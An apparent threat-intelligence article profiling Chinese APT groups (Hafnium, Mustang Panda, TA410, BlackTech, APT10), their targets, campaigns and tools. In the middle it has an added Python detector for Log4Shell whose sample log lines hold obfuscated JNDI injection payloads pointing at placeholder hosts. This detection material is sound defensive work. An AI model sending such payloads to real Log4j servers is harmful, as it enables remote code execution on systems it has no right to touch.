What is hiding behind the Great Firewall of China: The most prolific Chinese APTs (part 2)


The second part of a series provides an overview of the most prolific state-backed hacker groups associated with China, including their goals, targets, and Tactics, Techniques, and Procedures (TTPs).

Hafnium

Hafnium is primarily focused on entities in the US across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and nongovernmental organizations (NGOs). The group made headlines in 2021 after a widespread hacking campaign involving a set of four zero-day vulnerabilities affecting on-premises Microsoft Exchange Servers. These flaws allowed the attackers to gain access to user emails and passwords on affected servers, to obtain administrator privileges on the server, and to reach connected devices on the same network. The campaign affected tens of thousands of on-premises email customers, small businesses, enterprises and government organizations worldwide.

The first attacks were observed in January 2021 by cybersecurity company Volexity, when it discovered suspicious activity on two of its customers’ Microsoft Exchange servers. In March, Microsoft released security updates to address the bugs. Several months later, the US and several allies publicly accused hackers affiliated with the Chinese government of carrying out the Microsoft Exchange Server hack.

The Hafnium APT has also been observed exploiting the Log4Shell vulnerability (CVE-2021-44228) in Apache’s Log4j logging utility. The disclosure of the flaw caused widespread alarm because Log4j is widely used in commonly deployed enterprise systems.
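As an added defender-side illustration that is not part of the original article, the following Python snippet scans web-server access logs for Log4Shell (CVE-2021-44228) lookup strings, including the nested `${lower:...}` and `${::-x}` forms used to hide the literal `jndi` token. The log lines are constructed for the example; the field layout and IP addresses are assumptions.

```python
import re

# Constructed sample access-log lines (not taken from the article or any real incident).
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.6 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.7 - - [10/Dec/2021:10:01:04 +0000] "GET /?x=${${lower:j}ndi:${lower:r}mi://203.0.113.9/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.8 - - [10/Dec/2021:10:01:05 +0000] "GET /api HTTP/1.1" 200 12 "-" "Mozilla/5.0 ${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.10/c}"',
]

# ${lower:x} / ${upper:x} case-conversion lookups.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${:-x} / ${::-x} empty lookups that resolve to their default value "x".
_DEFAULT = re.compile(r"\$\{:{1,2}-([^${}]*)\}")
# The JNDI lookup itself, once obfuscation has been resolved.
_JNDI = re.compile(r"\$\{jndi:(ldap|rmi|dns|iiop|corba|nds|http)s?://", re.IGNORECASE)


def normalize(s: str) -> str:
    """Repeatedly resolve Log4j lookup tricks until the string stops changing."""
    prev = None
    while prev != s:
        prev = s
        s = _DEFAULT.sub(lambda m: m.group(1), s)
        s = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            s,
        )
    return s


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every line carrying a JNDI lookup string."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _JNDI.search(normalize(line))
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


if __name__ == "__main__":
    for n, scheme in find_jndi_lookups(SAMPLE_LOGS):
        print(f"line {n}: JNDI lookup via {scheme}")
```

The normalizer only covers the two most common obfuscation idioms; production rules should also decode URL- and Unicode-escaped input before matching.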

Hafnium has been seen compromising victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control. Once it has compromised a victim network, Hafnium typically exfiltrates data to file-sharing sites like MEGA.

Mustang Panda

Mustang Panda (also tracked as RedDelta, TA416, or Bronze President) is believed to be a China-based advanced persistent threat (APT) group that has been conducting cyber-espionage operations since at least 2014. The group has a history of targeting NGOs, government entities, religious organizations, and other non-governmental bodies in the US, Germany, Mongolia, Myanmar, Pakistan, and Vietnam, as well as other countries in Southeast Asia.

As for the attack vectors, Mustang Panda typically relies on phishing techniques in order to gain access to a target’s network. The phishing emails carry legitimate-looking documents written in the target’s native language and centered around themes of interest to a potential victim. These decoy documents contain a .zip archive which, when opened, executes a malicious loader leading to the installation of the PlugX or Poison Ivy malware or a Cobalt Strike Beacon.

Mustang Panda is believed to be behind a 2020 cyber-espionage campaign targeting a number of organizations related to the Catholic Church. According to researchers at Recorded Future, this activity was likely connected to the renewal of an agreement between the Vatican and the CCP and was aimed at gathering intel related to upcoming negotiations.

Mustang Panda was also linked to a cyber-espionage operation, known as “Operation Diànxùn”, targeting telecommunication companies based in Southeast Asia, Europe, and the US. The researchers believe that the goal of the operation was to obtain information pertaining to 5G technology, and that it was likely motivated by the ban on the use of Chinese technology in 5G rollouts in several countries.

The group is also believed to be responsible for a breach of at least ten Indonesian government ministries and agencies, including Indonesia’s primary intelligence service, the Badan Intelijen Negara (BIN), in April 2021.

TA410

This APT group has been linked to attacks against US utility providers between July and November 2019. In June 2020, security firm Proofpoint released a report detailing a new malware family named “FlowCloud”, which was used in attacks on entities in the US utilities sector.

The malware has remote access trojan (RAT) functionality that provides complete control over a compromised system, including access to installed applications, keyboard, mouse, screen, files, services and processes, and the ability to exfiltrate information via a command-and-control server.

FlowCloud was deployed at the same time as the “LookBack” malware, which was also used to target US utility companies, and Proofpoint believes that both LookBack and FlowCloud may be the work of a single threat actor, TA410.

BlackTech

BlackTech (Circuit Panda, Temp.Overboard, Huapi, Palmerworm) is a cyber-espionage group which has been active since 2012. The threat actors’ targets primarily include entities (government agencies and private organizations) in East Asia, particularly Taiwan, and occasionally Japan and Hong Kong. According to researchers, BlackTech’s goal is likely to steal its targets’ technology.

Over the past few years, the group has been linked by researchers to several malicious operations, including a campaign in which attackers took advantage of ASUS WebStorage to deliver a backdoor, and a large-scale cyber attack against Japanese electronics and electrical equipment manufacturing company Mitsubishi Electric Corp.

Since 2018, researchers have observed the adversary developing new tools, including the Consock malware discovered in 2018, the Waterbear loader found in 2020 and various ELF variants of the TSCookie malware.

BlackTech often utilizes legitimate software tools and processes to achieve its goals, using stolen digital certificates and API hooking among other techniques. The group’s arsenal includes a variety of malware (such as the Plead and BTSDoor backdoors, the TSCookie malware, the Flagpro downloader, and the DRIGO exfiltration tool) and techniques like spear-phishing emails, DLL side-loading, and the exploitation of RCE vulnerabilities in Microsoft Office (CVE-2012-0158, CVE-2014-6352, CVE-2017-0199).

APT10

APT10 (aka TA429, Menupass, Red Apollo, Stone Panda, Cicada) is a prolific state-sponsored hacker group with alleged ties to the Chinese government. Active since at least 2006, the group is focused on targeting the telecommunications, defense, construction, engineering, aerospace, and government sectors in the US, Europe, and Japan, likely with the goal of conducting commercial and economic cyber-espionage.

Like many APT groups, the threat actor relies on spear-phishing to gain an initial foothold on a victim’s network. The actor then uses a combination of publicly available and custom tools shared among Chinese APTs (such as the quasi-legitimate remote access tool Quasar and the Poison Ivy and PlugX malware) to establish persistence and move laterally within targets’ networks.

APT10 is believed to be behind an operation dubbed “Operation Cloud Hopper” in 2017, which targeted IT managed service providers (MSPs) in order to gain access to customers’ networks.

In 2018, the US Department of Justice charged two alleged members of APT10 for their role in global hacking campaigns targeting, among other data, intellectual property and confidential business and technological information at managed service providers.

Over the past few years, APT10 has been linked by researchers to several cyber-espionage campaigns, including Operation Soft Cell, in which the threat actor compromised at least ten telecommunications or cellular providers across the globe. The attack aimed to obtain Call Detail Records containing metadata on individual mobile subscribers, including device identifiers, locations, and call history.

In the most recent campaign, which came to light in February 2022, the threat actor was observed targeting Taiwan’s financial sector using a vulnerability in a security software solution used by around 80% of all local financial organizations. The campaign, dubbed “Operation Cache Panda” by Taiwanese security company CyCraft, has been going on since November 2021. During the attacks, the threat actors took advantage of a vulnerability in the web interface of the security software, deployed a version of the ASPXCSharp web shell, and then used a tool called “Impacket” to scan the victim’s internal network.
